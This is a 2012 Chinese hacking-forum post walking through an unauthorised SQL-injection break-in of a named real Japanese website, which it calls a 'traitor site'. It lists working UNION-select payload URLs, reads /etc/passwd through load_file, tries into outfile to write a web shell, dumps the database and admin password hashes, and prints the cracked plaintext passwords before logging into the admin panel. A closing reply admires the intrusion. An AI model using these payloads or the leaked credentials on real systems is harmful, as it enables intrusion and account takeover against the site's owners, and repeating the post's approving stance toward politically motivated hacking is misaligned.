中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
; V; J8 I0 I4 E3 u4 k* y
0 _: ^) i2 _3 u
0x01. 检测
www.zuaa.jp
收集数据
" c! u9 O5 l& z6 `1 x
[attach]73[/attach]
; }" ?1 o: C7 z/ V1 a, d
/ E$ Z \# n* }1 ~6 W% t4 Z
whatweb
# B# |7 r6 W" f
[attach]74[/attach]
. @. v+ ]8 Z. g! |' m. P7 r# X
. L$ }/ R) _2 e0 }
利用NMAP扫描
" V% U* t$ {$ i( [2 V. N* i; M
[attach]75[/attach]
& D7 o4 ]+ ]+ }* u
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
8 X6 {* L. f5 v) ?
0x02.找注入点
7 x3 X+ B" r7 G% m1 M4 x* e
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
4 c, a" G! k1 @. v4 Q+ v
[attach]76[/attach]
+ L0 {# l% p/ y7 ]
; C4 h1 W* J3 o; ?/ |! |* F# D, f, ^
0x03.order by
& ]6 c+ S8 G3 k9 m: i" A
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
o0 U6 e( s# ^
[attach]77[/attach]
) }; L3 U. z- e4 P; Q
order by 28报错,order by 27正常
! H+ B$ b" e3 f5 I' x5 ^9 \
# P; N- p2 A( S& s! d' y
0x04. union手动查询
' U* C7 P: u& k+ v2 F
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# m; a2 d0 r5 I' I$ e) l; Q8 J
添加到 27 时正常显示
1 @5 S% G$ O9 B0 i# S6 I. g
[attach]78[/attach]
* H K4 b6 I* T; d- j) ~
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
2 u" S4 a: o4 N+ K6 L# f
' Z5 G3 p. {$ w5 u' G' f4 x
0x05. info:
, J5 l8 ~! Q& @. [
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# h* h( F2 e, {* I+ t
[attach]79[/attach]
8 C4 R7 n9 e9 c6 P9 l( Q/ Q% f
user: root@localhost
+ o( s' s) Q9 N) \' t
database: openpne
8 p4 l- Y- a. u" q) n, g7 S
version: 4.1.22
( A# t% A- H* R7 _8 D! M
os: portbld-freebsd5.4
4 b% A5 L8 }( ]% ^) L; N( w& F6 e
) @$ c# ]+ O4 N2 u( |0 t
0x06. root用户
& g6 k& W! d: P1 E! q( t
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
# G. o% e, B& D' j1 D9 B8 w
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% T; Q4 n5 N9 Y5 Y
[attach]80[/attach]
2 E5 d$ H2 D& F
通过工具转换
?! S" f% [6 l& S% b
[attach]81[/attach]
5 y7 K3 A) w J
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
x/ y* e3 J" N; _* p; P* O" i
3 I7 R8 y) Q0 o& C
0x07. 利用 into outfile
! {* {5 U$ H+ m3 }- y1 t, Y
全部都失败
, `) g$ \4 ^& t; H; g# `/ W
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
; U( N- `. ~, S+ @9 `$ z
4 b& h2 j- M. F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
# l/ c3 I3 \# a5 W8 O$ b+ S
4 u ?. f0 j: |2 R
页面显示“MDB2 Error:syntax error”
; B9 l% b$ U; ~* t
( a1 q- ^/ x R4 o3 {
0x08. 利用 mysql 4.1
5 F4 s" M) ` Q+ q4 t P* F! V
猜常规表名,字段未果 工具 sqlmap
& I) |5 J: s5 w' h
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
, c* P1 ?; p2 o& p1 w& T
' A, P3 _) n0 V3 p1 c
[attach]82[/attach]
" P B4 d* K7 C% f& R
3 W' G j+ G) ~9 R& J- |
0x09. 查找后台
) n. i4 O2 P Z1 N3 B) D$ g" ~ t
利用 现有的各种 后台工具尝试都不行
! T F. ^+ f, [" G( V6 `" W/ k
% p5 e3 I. J( X$ K5 o5 |
0x10. MySL外联方法
) |. [/ b& }0 e$ b4 U+ N, A2 ~
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
& i! g/ o! {, I: r
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
( Y* Q* ^# j- ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
% I# e! f1 e, G! a2 Z! v/ R
[attach]83[/attach]
6 j/ b0 E2 F, q. F, t' I# W
这个可以在
www.cmd5.com
解密
M2 I8 i9 b2 W, v& O
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
/ r8 v3 L" Q9 R2 g% ~4 n
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
( U/ t9 i2 D! B- J* ~$ U* |5 r9 R
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
) I, ]0 F; d- Q) f A) C6 L6 u* B5 o
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
' Z2 ^2 s, u6 u) r* E
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
, J! j) E' K x; R
[attach]84[/attach]
% B0 H5 C, j' U% P) n; A
( {- Y: S$ A" m0 M0 x
0x11. 网站突破
3 P1 r+ I8 Y) R
发现网站的源程序 openpne, google 下载 openpne 源码
. i; K- P9 I L% |3 Z
[attach]85[/attach]
M7 I+ W# }- A O8 g4 Y
8 [/ j# h2 ^' D0 h" e$ D
0x12. 默认信息利用
2 s* z# F" e4 X1 j. ^
http://sns.zuaa.jp/?m=admin&a=page_login
& x$ n, y; @0 Z+ W/ {& |
[attach]86[/attach]
$ F! I6 D- @% M/ x" A+ R5 ^, B
表名 (c_admin_user) ,字段名(username,password)
0 i2 b, b. G5 j9 M" ~) @: F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
& I- m6 Q' x: ^
[attach]87[/attach]
7 k" U/ w. b& @9 ~/ s7 ^0 t
解密
' ~/ q, w+ b+ U0 d
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
# f. m7 Q0 f" E% f) g( ], n
zuaajp:c0923ec5857796a393da99905008c176, zju1897
& C( w& m, s- B7 G" r( }
2 I( N3 z! W: R/ U; N1 a
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
% R* _/ R0 M$ ~& C6 g* B
9 G: V- O# T5 X! J
0x13. 登录后台
- x+ `8 \1 t+ b: Q7 S! ?5 x
[attach]88[/attach]
4 K5 x4 k) N" O# E+ ?# e
8 O6 \9 O% u9 J, U. k
$ ~9 r3 \9 L% @( E
0x14. 小结
; S' }# V3 u9 |
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
4 N- A. N% M& Q' f% E
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
& M. M% j& T7 F& ^$ p& E; c
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
+ T, r* s) P; F) t7 E0 S, w, ^2 H* ~
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
( L$ `1 J T. E! i+ T) m7 N9 R
5 c5 L2 T) q; `! [4 h$ `
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
+ g/ e/ {1 z& ?) `8 s# H
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2